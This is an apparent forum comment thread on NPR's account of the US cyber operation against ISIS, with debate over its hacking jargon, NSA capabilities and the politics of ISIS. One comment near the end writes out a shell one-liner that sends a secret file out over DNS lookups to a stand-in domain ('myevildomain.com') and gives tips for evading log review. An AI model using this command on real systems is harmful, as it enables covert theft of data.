How the US Hacked ISIS(npr.org) |
How the US Hacked ISIS(npr.org) |
> After that, the momentum started to build. One team would take screenshots to gather intelligence for later; another would lock ISIS videographers out of their own accounts.
> "Reset Successful" one screen would say.
> "Folder directory deleted," said another.
Folder directory??? Did they also delete the "file document"?
> The screens they were seeing on the Ops floor on the NSA campus were the same ones someone in Syria might have been looking at in real time, until someone in Syria hit refresh. Once he did that, he would see: 404 error: Destination unreadable.
404 error: Destination unreadable??? At least, use "unreachable"...
> "Target 5 is done," someone would yell.
> Someone else would walk across the room and cross the number off the big target sheet on the wall. "We're crossing names off the list. We're crossing accounts off the list. We're crossing IPs off the list," said Neil. And every time a number went down they would yell one word: "Jackpot!"
[0] TV Tropes: Hollywood Hacking is when some sort of convoluted metaphor is used not only to describe hacking, but actually to put it into practice. Characters will come up with rubbish like, "Extinguish the firewall!" and "I'll use the Millennium Bug to launch an Overclocking Attack on the whole Internet!" https://tvtropes.org/pmwiki/pmwiki.php/Main/HollywoodHacking
Very likely something happened, but it almost certainly wasn't like this.
"On August 24, 2015, a 21-year-old British hacker named TriCk stepped out of an Internet cafe in Raqqa, Syria, and climbed into his car. He didn't know it, but he'd been under surveillance for days. He pulled into a gas station, and just as he started filling the tank, a single Hellfire missile came down on him like a meteor from the sky. He was killed instantly."
And it seems to be longer too.
https://www.npr.org/transcripts/763545811
They also later identify the "British hacker's" name: Junaid Hussain.
A report from Britain, 2015, claims it wasn't an operation done by the U.S. alone:
https://www.birminghammail.co.uk/news/midlands-news/isis-ter...
I obviously don't know how accurate this piece is but a "folder directory" is, or at least used to be, a legit way to describe a folder full of folders.
You'll see outdated/unorthodox terminology like this all the time in old systems, and even some newer ones that were built or maintained by people who aren't native English speakers. Daily WTF used to be filled with this kind of stuff.
Thanks, that's interesting.
"So, X has been infiltrating <company> for the past few days."
"Really? <company>? <famous company>?"
"Yep. We're keeping them looped in on everything, and they told us to try to get as far as possible. Apparently they were running <outdated version> of <software> on one of their boxes, and <scanner> picked it up."
"That actually happens?"
"He's <highly surprising claim> right now. You'd be surprised how far you can get, jumping from one box to another."
I can't give much more detail than that, for obvious reasons, but the reality is that it's very methodical, very "boring" work. It's basically a giant matrix of probabilities: there are hundreds of thousands of attack vectors, and your job is to tap as many as possible, sorted by probability of effectiveness, until something sticks. Then use your head to get further, adapting to the situation on the fly.
And ... writing reports. Jesus, if someone had told me that 70% of your day would be spent writing reports, I probably wouldn't have joined. But the 30% of other stuff made up for it.
That feeling you get when you break into somewhere you're not supposed to be, and that you were paid to do it, is amazing. The rules change from engagement to engagement, but usually it's "do whatever you want, but don't modify any data, i.e. no destructive actions, and all info you've collected will be deleted at the end of the engagement."
Must be interesting to be a spook in the NSA doing that kind of stuff offensively.
Also, it might seem absurd that I'm comparing this story to the most elite hackers in the developed world. And maybe it is. But if you knew which <company> it was, and exactly what <highly surprising claim> was, you'd be shocked that one or two smart developers poking at internals were able to compromise the entire corporate network of <famous company>, to the point of being able to... well. Let's just say, I wish I could say. It's a weird feeling, seeing it with my own eyes, knowing it's true, and never being able to talk fully about it. :)
So I imagine the NSA spooks are doing similarlly-methodical work, with some cheat codes like "we intercepted their computer before delivery and installed a backdoor that only activates when we send a specially malformed packet that would normally be dropped and is therefore invisible, which grants us access as needed."
as far as I understand error correcting codes can and are used at different levels of communication protocols (hardware each link, hardware at endpoints, software at end points, ...)
I often wonder if recoverable errors at the endpoints are ever used to exfiltrate data? the higher levels of the stack would see the corrected overt message, while underlying levels (hardware or software) that perform the error correction has access to the covert information encoded in the error.
This may be testable by FPGA and sorting connections by protocol, origin, destination, ... to identify connections with suspiciously high amount of ECC recoverable errors as compared to the rest.
This may be very hard to test if MitM'ed (by ISP, network card manufacturer, ...) such that benign packets get recoverable errors introduced as well (to hide the malicious ones in the noise), which would increase the complexity since now the malicious hardware or software at the endpoints needs to discriminate artificial errors from covert messages over the error channel. There would be many ways of going about this.
>And what they contained weren't glowing lines of code: Instead, Neil could see login screens.
maybe they're dealing with the kind of people who name their folders "directory"
It's all fun and games until someone melts down a reactor.
The journalist is probably playing with Cunningham's Law, but I distinctly recall the doomsday gap scene ( https://news.ycombinator.com/item?id=24481298 ) as having been closer to the middle of Dr. Strangelove. The end came after the referent of https://www.youtube.com/watch?v=K10pdj5YOy0 .
Bonus clip (note the lack of any source attribution problem in these cases): https://www.youtube.com/watch?v=nZ8oA9-OQrg
I suspect shutting down their media probably stopped having an effect through novelty wearing off, all the best recruits being recruited and the world moving on to (inadvertently or not) selling some other reactionary rebellion - and the group being militarily defeated in Syria.
(I trust Linebarger more than Bernays because the former also catalogues not only his failures, but sotto voce, even touches upon those of his mid-twentieth century society.)
Bonus clip: https://www.youtube.com/watch?v=mLNAkPsjAEk (what's the hip hop equivalent?)
why does china care so much about the dalai lama?
I'd guess because:
https://en.wikipedia.org/wiki/CIA_Tibetan_program
"a nearly two decades long anti-Chinese covert operation focused on Tibet which consisted of "political action, propaganda, paramilitary and intelligence operations""
"Although it was formally assigned to the CIA, it was nevertheless closely coordinated with several other U.S. government agencies such as the Department of State and the Department of Defense."
Dalai Lama is where he is now as the result of this.
https://theintercept.com/2018/01/29/isis-iraq-war-islamic-st...
https://www.abc.net.au/news/2019-12-18/inside-the-islamic-st...
"Doc of the Day: NSA, DHS Trade Players for Net Defense"
https://www.wired.com/2010/10/doc-of-the-day-nsa-dhs-trade-p...
The fatigues are common in the pictures:
https://www.cyberscoop.com/us-cyber-command-nsa-government-h...
Edit: Really not sure why I got downvoted, as I provided accurate info?
Yeah.. probably not how it happened.
There was 80 persons inside one of the most powerful room of the world so they just use his first name to protect his identity.
That article was painfully too long.
[0] one example: https://www.theguardian.com/guardian-observer-style-guide-a
Headers will be sent over the wire in the clear before any redirection can occur.
A localhost-bound proxy can fix this before the request leaves network interface.
I guess the "modern" browser fixes this for everyone else not using a ("modern") proxy.
Only if the site owner wants it so https://hstspreload.org/
Think about Enigma and Lorenz, or any cold war double agent - you've got this fountain of knowledge but if you start burning assets left right and centre they'll realize something's wrong (Or in the case of MI6 they'll get embarrassed and allow the double agent to slip away as long as they shut up)
Inspired by a low-tech single-ply version: https://en.wikipedia.org/wiki/Operation_Scherhorn
and Linebarger's suggestion for how to drive enemy intelligence mad: http://www.gutenberg.org/files/48612/48612-h/48612-h.htm#Pag...
> "If you feel like showing off, average everything into everything else and call it the Gross Index of Total Enemy Morale. This won't fool anyone who knows the propaganda business, and you won't be able to do anything with or about it, but you can hang it on a month-by-month chart in the front office, where visitors can be impressed at getting in on a military secret. (Incidentally, if some smart enemy agent sees it and reports it back, enemy intelligence experts will go mad trying to figure out just how you got that figure. It's like the old joke that the average American is ten-elevenths White, 52% female, and always slightly pregnant.)"
TIL CthulhuPunk is a thing.
Anyone familiar enough with the Cthulhu-mythos to tell me if there are any impediments in canon to the following retcon: what if Great Old Ones are Scissor Entities, and appear to xenophobes as horrific monsters of vaguely anthropoid outline, with octopus-like heads and prodigious claws, but to xenophiles as animated pegasus unicorns, and, as part of their eternal struggle against the Blue Meanies, drive the former to gibbering madness but invite the latter over for tea?
https://i.pinimg.com/originals/e9/a4/fa/e9a4fae35f467f77b98b...
ISIS was actually there, founded by Zarqawi like any other group, but its main differentiator was its swift rise to power and popularity after 2011 benefiting from the unbearable oppression of Sunnis in Iraq by Iran and its proxy, which made them align with whoever could be their savior and get rid of the Iranian influence. You can see this clearly when ISIS stormed the prisons where thousands of Sunnis were sentenced to death, and made them into the second wave of recruits.
US did enable ISIS, Zarqawi and co created it, Iran gave people a reason to join it in mass, and international agenda, most importantly the US object to get its enemies (Iran and ISIS) bleed each other, and the Kurdish leftists to ask for its help to the degree to become its proxies, left a space for it to be the monster it was.
Can't also ignore the Turkish and Kurdistani indifference (before ISIS started attacking them, there were ISIS/Kurdistani checkpoints side by side drinking tea together), and the Syrian allowance of fighters flood to Iraq through its the eastern borders since the invasion.
Blaming only the US (although it's the initial culprit) doesn't address the complexity of this problem.
He got to manage a country that just got invaded, that used to have a huge military and where the occupiers are still fighting the remnants of rebel forces in some part of the country.
In that context, he decided that the former officers from Saddam Hussein's regime would be barred from the new Iraq military and that they should not receive pension either.
He, put yourself in their shoes: when your job is to organize a military, that the only lawful employer refused your services and denies your pension, are you going to go homeless and beg in the streets or are you going to join a rebellious startup?
The ISIS of the origin was organized just like the Baath army was, because that's the framework the officers knew. There were some documents captured (that involved less "hacking" than physical invasion of command structures but of course we never know the amount of covert ops going on) and what they revealed was that one budget line was the biggest of the whole organization: pensions. Suicide bombing is not the career path everybody chose there.
ISIS is not a US creation: that would imply GWB's administration capacity to plan such a thing. But it came from crucial mistakes the US did despite being warned about these years prior.
The apocalyptic aspect (literally), for instance, is essential to understand ISIS, and it's early split from Al-Qaeda, for example.
The US turned a blind eye because ISIS was fighting a regime they wanted to change. They could have pressured Turkey and Qatar to stop; and they would oblige. But everything has a cost I guess.
Stopping the help provided by outside countries may have weakened the movement, but not prevented it.
The US finances many terrorist groups ourselves, so I'm not sure what your point is—nations are happy to take advantage of new powers regardless of how it conflicts with their propaganda. I don't know how you could look at the invasion of Iraq and come away with the conclusion that ISIS is either surprising or could have formed without our help.
(for a different blue-on-blue scenario: what might the cyber equivalent of leaving a grenade pin on an officer's pillow be?)
The invasion wasn't the hamfisted part - the problem was being reckless after the invasion and not really thinking properly about how to manage the country.
Note how the USSR dissolved without intervention.
Dropping bombs is like taking antibiotics, sometimes necessary but always creates resistance.
And who supplied those weapons of mass destruction to saddam? I wonder...
I won't go so far as to say that the whole fiasco could have been avoided with a functioning economy and some new civil service/protection branch to absorb the officers, but the US's strategy was one of the biggest contributors to ISIS's growth.
> "But there are U.S. intelligence officials who still worry about what Cyber Command’s rise will mean for espionage missions."
suggests another domestic explanation for revealing Glowing Symphony would be turf wars with non-concurring bureaucracies.
(Apparently successfully, judging by 2020 changes to us code buried somewhere in the appropriations bill S.1790 § 1632.
Poorer US HN'ers may be interested to know there's also language in that bill about cyber pay rates, which I left unread but would guess implies they're attempting to be competitive with private sector compensation.)
Examples I've seen so far (note that it's not always triggered, there must be some "if" conditions here. It's not always reproducible).
* All lower-case titles are capitalized.
Generally good, but not always enforced, it's strange.
* Unnecessary caps are removed.
Many false positives. "MIT CSAIL" becomes "MIT Csail", DARPA becomes "Drapa", etc.
* "%d Ways To Do X" and "How To Do X" becomes "Do X", per Guideline.
It misfired when I tried to submit "20 °C – A Short History of the Standard Temperature for Dimensional Measurements" by NIST. The "20" was removed and I had to edit it back!
A submission of "How we threat model" by GitHub became "We threat model", makes the already-short title unreadable.
* Clickbait words are removed.
Generally good. But false positives exist. For example, "Massive Parallel" is a legitimate concepts in computing, but the word "massive" will be removed. I just tried "Massive MIMO", which is similarly a legitimate concept in communication, got removed as well.
Try submitting this paper "Pilot Optimization and Channel Estimation for Multiuser Massive MIMO Systems" (https://arxiv.org/abs/1402.0045), you'll see that the word "massive" is deleted immediately after submission (but as I said, the reformatter is not always triggered and not always reproducible, perhaps your high karma will stop the filter from doing it).
* "Your Statement is 100% correct" becomes "Statement is 100% correct".
This is a good one, the unnecessary personal element is removed.
That story, and that's what it is, has to be put in the form of a bad movie, considering the intellectual level of the target audience.
Kipling on empire, in Her Majesty's Servants (a story addressed to children but not necessarily intended for them):
> "But are the beasts as wise as the men?" said the chief.
> "They obey, as the men do. Mule, horse, elephant, or bullock, he obeys his driver, and the driver his sergeant, and the sergeant his lieutenant, and the lieutenant his captain, and the captain his major, and the major his colonel, and the colonel his brigadier commanding three regiments, and the brigadier his general, who obeys the Viceroy, who is the servant of the Empress. Thus it is done."
> "Would it were so in Afghanistan!" said the chief; "for there we obey only our own wills."
> "And for that reason," said the native officer, twirling his moustache, "your Amir whom you do not obey must come here and take orders from our Viceroy."
"Nakasone said the American people shouldn't worry about the 2020 elections because Cybercom is prepared to prevent the Russians from repeating what they did in 2016."
"TEMPLE-RASTON: Even saying that much is new. Remember - offensive cyber not so long ago was something they didn't talk about, and now, all of a sudden, they seem to be. So why is General Nakasone talking about this now?
DEIBERT: What's happening here is part of a deterrent justification."
Then they give an explanation of this using some lines from Dr. Strangelove.
By the way, the show was "written and hosted by Dina Temple-Raston," who also wrote the article, and I liked the show.
-----
Edit: responding to "deterrent could easily be communicated privately" below: -- no, that's too narrow thinking: consider the potential target as "anybody who'd be willing to try it at home." That's a much bigger target group than potential workers. Also consider every "it" that people would be potentially scared to do.
Edit2: re. the edit of the post below involving joke with the submarines -- I fail to see any relation to anything discussed here, and I'd also like to know if anybody but the writer even understands what the joke is. I honestly don't. Meh.
Edit3: re "MAD": Like I've said I don't believe it's about MAD, but "anybody who'd be willing to try it at home." Anybody in front of the computer anywhere in the world, including, but not exclusively, some future "Junaid Hussain." (and, if I'm closer to the correct answer, Cybercom can give me 10 upvotes here).
Edit4: I think I understand it now after it's added that the "joke meant to illustrate MAD" -- I guess he didn't follow the link, but reacted to "Dr. Strangelove" reference believing it's about MAD, even if it never was. As per transcript, it's there to argue: "if you keep it a secret [i.e. American offensive cyber operations] - you could say the same thing about American offensive cyber operations. They've been so stealthy for so long, maybe people don't realize the U.S. has them." Note "people." As is, people wouldn't be scared to do something the U.S. doesn't like, instead of thinking who'd be the target of next U.S. drone attack.
As written in https://news.ycombinator.com/item?id=24522125 I don't believe everyone apparently having more offensive than defensive capability is necessarily the most stable of situations.
[1] the true end: https://www.youtube.com/watch?v=cIpTE-aHEZ0
On the "mineshaft gap": https://news.ycombinator.com/item?id=23712008
Have you got change for 20 million people? https://boardgamegeek.com/boardgame/713/nuclear-war
[2] "There was too much there to move, and we knew we had to break [Chrome], burn her straight down, or she might come after us."
(b) taking out an electrical grid is not at all comparable to MAD.
I'd imagine domestic recruiting to be more likely, along the lines of the prime-time channel 1 song-and-dance mentioned in: https://news.ycombinator.com/item?id=24453689
==== Edit: joke meant to illustrate (b), the Assured Destruction part that makes MAD a non-iterated game. I agree that if TFA is not about MAD, then threatening Proportional Inconvenience can be an effective deterrent in an iterated game, a deterrent much more applicable to future Hussains than to future Bystrovs. (indeed, in that scenario, I would worry about non-nuclear powers swatting each other via Uscybercom) ====
In the middle of the Carribean, a US sub, gleaming and spotless, surfaces next to a dingy-in-comparison russian sub, whose boomers are sprawled out in undershorts and telnyashki, listlessly passing around vodka bottles across a littered foredeck.
One of them is murmuring over and over again, "which one of you idiots threw slippers on control board?"
On the US sub, a dress-uniformed officer in Randolph Engineering glasses emerges from the hatch. "This is the Captain of the USS Alaska. May I speak with your captain, please?"
On board the russian sub, the only response is the clinking and refilling of glasses.
"I repeat, I am Commander William Dull, captain of the USS Alaska, SSBN 732. I would like to speak with your captain!"
A small fight breaks out on the russian sub over who last poured.
"Damn it, what is up with you russkies? Do you call that shipshape? At least we learn discipline back home at King's Bay! Di. Sci. Pline!"
"Don't you get it?" yells back the murmuring russian, in english now. "Is no King's Bay any more." Then he recommences his russian refrain, a little more loudly, "Oi, which one of you idiots threw valenki on control board?"
Here's one I do understand: Suppose you want to exfiltrate some data out of a network without raising alarms. One way to do it is to set up a DNS server. Basically, you use DNS itself as a communication method, not merely a lookup table.
I've never actually used it, but it always seemed a cool idea. Almost no one blocks DNS, which means you can send data from anywhere in the world in a very unexpected way. You'd of course want to keep the transmission size reasonable (perhaps 5GB of DNS traffic might raise some eyebrows) but any system that you can `nslookup foo.com 8.8.8.8` on, you'd be able to `nslookup foo.com <your special server>` on. So this technique works in almost every case, except extremely monitored systems that only allow outgoing connections to a specific set of restricted IP addresses.
But for the special network protocol that the NSA uses to access backdoored NICs, I forget why it works, since the packet would need to pass through many routers along the way. In fact, I feel like I'm misremembering. Most target computers are behind routers, so it really doesn't make sense. Maybe it's a technique used against routers themselves. All I remember is that the NSA has some type of "signals we can send which normal networking tooling doesn't detect at all," along with a dose of "we know Iran just ordered some new servers, so we intercepted the servers and installed a backdoor." (The latter is called TAO: https://en.wikipedia.org/wiki/Tailored_Access_Operations)
They definitely do something with NICs though. The ANT document (https://en.wikipedia.org/wiki/NSA_ANT_catalog#Capabilities_l...) shows "COTTONMOUTH-III is a stacked Ethernet and USB plug costing approximately $1.25M for 50 units." Must be one hell of a plug.
https://en.wikipedia.org/wiki/NSA_ANT_catalog#/media/File:NS... is also pretty neat. It's a USB airgap bridge, i.e. janitor walks up and plugs it in to the target device. I wonder what the range on stuff like that is... Seems like you'd have to be sitting outside in a van or something, which is rather hard to do if your target is a nuclear enrichment facility (stuxnet).
You don’t need to tell nslookup to use a special server. If you control the SOA for your own domain, the normal DNS server will happily exfiltrate your data for you.
The technique worked well for portals that allowed arbitrary DNS-over-UDP as well as portals that had their own exclusive DNS - provided that those portals worked by redirecting all IP traffic (i.e. they didn't fake DNS results).
It was slow though... I think I maxxed-out at around 8KBps (~64kbps) - barely enough for basic email functionality and text-only web-surfing.
https://www.congress.gov/bill/116th-congress/senate-bill/179...
§ 5707 (c)(2): "the implications of [5G] global and regional adoption on the cyber and espionage threat to the United States, the interests of the United States, and the cyber and collection capabilities of the United States;"
Does taking antibiotics always result in antibiotic resistant bacteria?
I wasn't aware of that, and at first glance it seems implausible as otherwise all antibiotics would have been ineffective before we even discovered them?
Your wider point still stands though, various parts of nature have been putting chemical warfare against each other for a very long time.
We'd best be careful we don't suddenly find ourselves on the wrong side of that battle.
The point in the article after mentioning Dr. Strangelove uses however the same wording that I've pointed to:
"You could say the same thing about American offensive cyber operations. They have been so stealthy for so long, maybe people don't realize we have them."
It's even easier that if you just want to sneak a relatively small file out.
for n in $(base64 mysecretfile|sed 's/.\{63\}/&\n/g'); do nslookup $n.myevildomain.com; done
Then get the file out of your evil DNS server logs at the other end. Of course this depends on how much DNS logging the local site is doing and if anyone is paying attention to those logs, but a few random sleeps should help there.So banks then do ridiculous things like checking your timezone and checking your name and the memo fields so they get to have a stronger defense in court.
Sure enough, the transaction was blocked, my account was disabled, and I had to send paypal an email saying that I wasn’t an arms dealer.
> PayPal is currently blocking all transactions containing the word “tardigrade”
https://news.ycombinator.com/item?id=24450828
And one of the top comments said:
> PayPal gets a list of banned strings from the Office of Foreign Asset controls. If any match those strings it's flagged for a review.
Not really. Antibiotic treatment selects for existing variation within bacteria.
Some bacteria may already be weakly tolerant. Using antibiotics will likely lead to that trait being selected for, and the tolerance becomes stronger.
What have you been studying to get to PhD level as per your prolife info?
You obviously know what you're talking about, and I only have a fairly lay level understand :)